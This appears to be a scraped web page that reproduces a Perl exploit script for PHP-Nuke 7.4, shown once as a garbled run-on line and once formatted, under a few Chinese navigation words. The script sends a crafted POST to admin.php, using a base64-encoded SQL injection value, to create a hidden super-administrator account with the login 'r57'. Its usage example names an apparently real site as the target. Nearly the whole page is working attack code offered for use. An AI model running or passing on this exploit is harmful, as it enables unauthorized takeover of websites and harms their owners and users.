模板
教程
环境
性能
功能
管理
PHP-Nuke7.4"add-admin"exploit
r57phpnuke74.pl http://volgorod.khn.ru/admin.php# DONE!# Now go to http://volgorod.khn.ru/admin.php and login via 'r57' as name and 'r57' as password# jabi-dabi-duuuu ... stupid php-nuke coders =(# -----------------------------------------------------------------## *** php-nuke must be run via mysql > 4.0use LWP::UserAgent;if (@ARGV != 1){print "usage: $0 [path_to_admin.php]\n";exit;}$path = $ARGV[0];$php_nuke = LWP::UserAgent->new() or die;$php_nuke->post("$path", {"add_aid" => "r57", ### login"add_name" => "r57", ### name"add_pwd" => "r57", ### password"add_email" => "r00t\@r00t.br", ### mail"admin" => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ### magic... =)"add_radminsuper" => "1", ### yeap supa admina"op" => "AddAuthor" ### add me baby}); print "DONE!\nNow go to $path and login via 'r57' as name and 'r57' as password";exit;">#!/usr/bin/perl
# r57phpnuke74.pl - very very lame PHP-Nuke 7.4 "add-admin" exploit
# -----------------------------------------------------------------
# by 1dt.w0lf .. RusH security team .. http://rst.void.ru
#
# this coded just for fun
# -----------------------------------------------------------------
# C:\>r57phpnuke74.pl http://volgorod.khn.ru/admin.php
# DONE!
# Now go to http://volgorod.khn.ru/admin.php and login via 'r57' as name and 'r57' as password
# jabi-dabi-duuuu ... stupid php-nuke coders =(
# -----------------------------------------------------------------
#
# *** php-nuke must be run via mysql > 4.0
use LWP::UserAgent;
if (@ARGV != 1)
{
print "usage: $0 [path_to_admin.php]\n";
exit;
}
$path = $ARGV[0];
$php_nuke = LWP::UserAgent->new() or die;
$php_nuke->post(
"$path",
{
"add_aid" => "r57", ### login
"add_name" => "r57", ### name
"add_pwd" => "r57", ### password
"add_email" => "r00t\@r00t.br", ### mail
"admin" => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ### magic... =)
"add_radminsuper" => "1", ### yeap supa admina
"op" => "AddAuthor" ### add me baby
}
);
print "DONE!\nNow go to $path and login via 'r57' as name and 'r57' as password";
exit;
